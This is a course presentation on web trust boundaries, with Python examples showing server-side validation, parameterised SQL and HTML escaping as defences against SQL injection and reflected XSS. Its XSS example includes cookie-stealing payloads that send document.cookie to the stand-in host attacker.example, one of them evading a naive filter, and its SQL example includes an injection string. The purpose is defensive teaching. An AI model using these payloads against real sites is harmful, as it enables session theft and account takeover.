Web Trust Boundaries and Security Vulnerabilities - PowerPoint PPT Presentation
1
Web Trust Boundaries and Security Vulnerabilities
  • Haris Volos and Hidayat Teonadi
  • CS739 Distributed Systems

2
Problem
  • Web of trust
    • The web crosses many trust boundaries
  • To avoid careless delegation of trust, follow these
    principles:
    • Be specific
      • Who is in your trusted group?
      • What actions do we trust them to take?
    • Be careful
  • Bad design example
    • A server offloads work to a client it trusts, but the
      client is either malicious or is bypassed altogether.

3
Starting point: Java Applets
  • Hypothesis
    • Applets perform computation in the client browser on
      behalf of the server.
  • Using a web crawler (Larbin), we searched for Java
    applets.
    • Besides Java chat applications, the other results
      seemed uninteresting.
  • Conclusion
    • Applet usage is not rampant.

4
Web Apps: JavaScript
  • Interactive web applications
    • The main app resides on the server side (e.g. a Servlet)
    • JavaScript is used for client-side computation
    • Example: input data validation
  • Robust web applications
    • JavaScript can be easily circumvented: the user can simply
      disable it in the browser, or send the request without it.
    • Never rely solely on client-side JavaScript validation;
      the server must validate every field again on arrival.

5
Security Vulnerabilities
  • Prevalent, because web apps cross trust boundaries
  • A malicious user will try to exploit these boundaries
  • The web app must protect itself
    • Is cryptography enough? No! Encrypting the channel does not
      make the data the client sends over it trustworthy.
    • Must validate any data that crosses the trust boundary
  • Example vulnerabilities
    • Cross-site scripting (XSS), SQL injection
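The two slides above make one point: what the server receives is a raw request body, not the output of the page's JavaScript, so validation and SQL handling must happen server-side. The following example is added here to show that and is not code from the presentation; it uses an in-memory SQLite table in place of the MySQL backend, a hypothetical order form with `username` and `quantity` fields, and constructed request bodies, one as a browser running the page's JavaScript would post it and one as a client that skipped that JavaScript can post it.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Constructed sample request bodies (application/x-www-form-urlencoded),
# i.e. what actually arrives at the server after the form is posted.
# The first is what a client-side JavaScript validator would let through;
# the second is what a client that skips or disables that script can send.
WELL_FORMED_BODY = "username=alice&quantity=3"
CRAFTED_BODY = "username=nobody%27+OR+%271%27%3D%271&quantity=-5"

# Allow-list for the username field: the server decides what is acceptable,
# independently of whatever the page's JavaScript checked (hypothetical rule).
USERNAME_RE = re.compile(r"[A-Za-z0-9_]{1,32}")


def validate_order(raw_body: str) -> dict:
    """Server-side validation of the posted form. Returns the cleaned fields
    or raises ValueError. It never assumes the browser ran any JavaScript."""
    fields = parse_qs(raw_body, keep_blank_values=True)
    username = fields.get("username", [""])[0]
    quantity = fields.get("quantity", [""])[0]
    if not USERNAME_RE.fullmatch(username):
        raise ValueError("username: must be 1-32 characters of [A-Za-z0-9_]")
    # str.isdigit() rejects a leading '-' or '+', so '-5' fails here.
    if not quantity.isdigit() or not 1 <= int(quantity) <= 99:
        raise ValueError("quantity: must be an integer from 1 to 99")
    return {"username": username, "quantity": int(quantity)}


def make_db() -> sqlite3.Connection:
    """In-memory table standing in for the application's database backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, credit INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", 10), ("bob", 0)])
    return conn


def lookup_credit_unsafe(conn: sqlite3.Connection, username: str):
    """Vulnerable: the untrusted value is spliced into the SQL text."""
    sql = f"SELECT credit FROM users WHERE name = '{username}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def lookup_credit_safe(conn: sqlite3.Connection, username: str):
    """Hardened: the value travels as a bound parameter, never as SQL."""
    row = conn.execute("SELECT credit FROM users WHERE name = ?",
                       (username,)).fetchone()
    return row[0] if row else None


def handle_request(conn: sqlite3.Connection, raw_body: str) -> str:
    """The server-side path every request must take: validate, then query
    with bound parameters. Returns a short status string for the caller."""
    try:
        fields = validate_order(raw_body)
    except ValueError as err:
        return f"400 Bad Request: {err}"
    credit = lookup_credit_safe(conn, fields["username"])
    if credit is None:
        return "404 Not Found: no such user"
    return f"200 OK: {fields['username']} has credit {credit}"


if __name__ == "__main__":
    db = make_db()
    print(handle_request(db, WELL_FORMED_BODY))
    print(handle_request(db, CRAFTED_BODY))
    # Even if validation were skipped, only the concatenated query is fooled:
    # the injected clause makes it match the first row of the table.
    injected = "nobody' OR '1'='1"
    print("unsafe:", lookup_credit_unsafe(db, injected))
    print("safe:  ", lookup_credit_safe(db, injected))
```

Validation and parameterisation are deliberately separate layers: the allow-list rejects the crafted body outright, and the bound parameter makes sure that a value which does slip past validation is still treated as data rather than as part of the query.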

6
Case Study: RoundCube Webmail
  • RoundCube Webmail is a browser-based IMAP client with an
    Apache/PHP/MySQL backend.
  • RSnake from ha.ckers.org exposed a type 1 (reflected) cross-site
    scripting (XSS) vulnerability in it.
    • Type 1 XSS allows foreign code to be injected into a
      server-generated dynamic page.
    • Exploit scenario: a malicious script can silently obtain the
      victim's sensitive credentials in the form of cookies.
  • We managed to reproduce the XSS vulnerability locally.
  • We realized how seemingly adequate server-side validation
    can still be circumvented.
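To show what "seemingly adequate server-side validation" looks like in the reflected XSS setting, the following example is added here; it is not RoundCube code and does not reproduce the actual vulnerability. It assumes a hypothetical search page that echoes a query parameter into server-generated HTML, a naive filter that strips literal `<script>` tags, and constructed payloads that target a placeholder exfiltration host. The contrast is between filtering the input and encoding the output for its context.

```python
import html
import re

# Constructed inputs for a hypothetical search page that reflects a query
# parameter into server-generated HTML. The page, the payloads and the
# attacker host are assumptions for this example, not RoundCube's.
BENIGN_QUERY = "vacation photos"
PLAIN_SCRIPT = ("<script>new Image().src='http://attacker.example/?c='"
                "+document.cookie</script>")
CASE_VARIANT = ("<ScRiPt>new Image().src='http://attacker.example/?c='"
                "+document.cookie</sCrIpT>")
NO_SCRIPT_TAG = ("<img src=x onerror=\"new Image().src="
                 "'http://attacker.example/?c='+document.cookie\">")

# The "seemingly adequate" server-side filter: strip <script> and </script>.
# It is case-sensitive and knows nothing about event-handler attributes.
SCRIPT_TAG_RE = re.compile(r"</?script>")


def render_naive(query: str) -> str:
    """Filter-based attempt: removes literal <script> tags, nothing else."""
    cleaned = SCRIPT_TAG_RE.sub("", query)
    return f"<p>Results for: {cleaned}</p>"


def render_safe(query: str) -> str:
    """Encoding-based fix: escape for the HTML text context, so the browser
    renders every character of the query as text and never as markup."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


def reflected_part(rendered: str) -> str:
    """The slice of the page that came from the request parameter."""
    return rendered.split("Results for: ", 1)[1].rsplit("</p>", 1)[0]


def is_injected(rendered: str) -> bool:
    """True if a raw '<' reached the page from the parameter, i.e. the
    browser will parse attacker-controlled text as a tag. Escaped output
    contains only '&lt;', which stays inert in a text node."""
    return "<" in reflected_part(rendered)


def session_cookie_header(session_id: str) -> str:
    """Defence in depth for the cookie-theft scenario: HttpOnly keeps the
    cookie out of document.cookie even if a script does run."""
    return f"Set-Cookie: session={session_id}; HttpOnly; Secure; SameSite=Lax"


if __name__ == "__main__":
    cases = [("benign", BENIGN_QUERY), ("plain", PLAIN_SCRIPT),
             ("case variant", CASE_VARIANT), ("no script tag", NO_SCRIPT_TAG)]
    for label, q in cases:
        print(f"{label:14} naive injected={is_injected(render_naive(q))!s:5} "
              f"safe injected={is_injected(render_safe(q))}")
    print(session_cookie_header("constructed-id"))
```

The naive filter passes its own obvious test case (the plain `<script>` payload) and fails both variants, which is exactly the trap the slide describes: a filter is judged against the payloads its author imagined. Escaping for the output context has no such list to get wrong, and the HttpOnly cookie attribute limits the damage of any script that still runs.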

7
Next Steps
  • Study trust boundaries more broadly
    • Find more web applications
    • Use a web vulnerability scanner (e.g. Gamja) to guide
      the search
  • Expose vulnerabilities
    • Study them, and
    • Propose corrections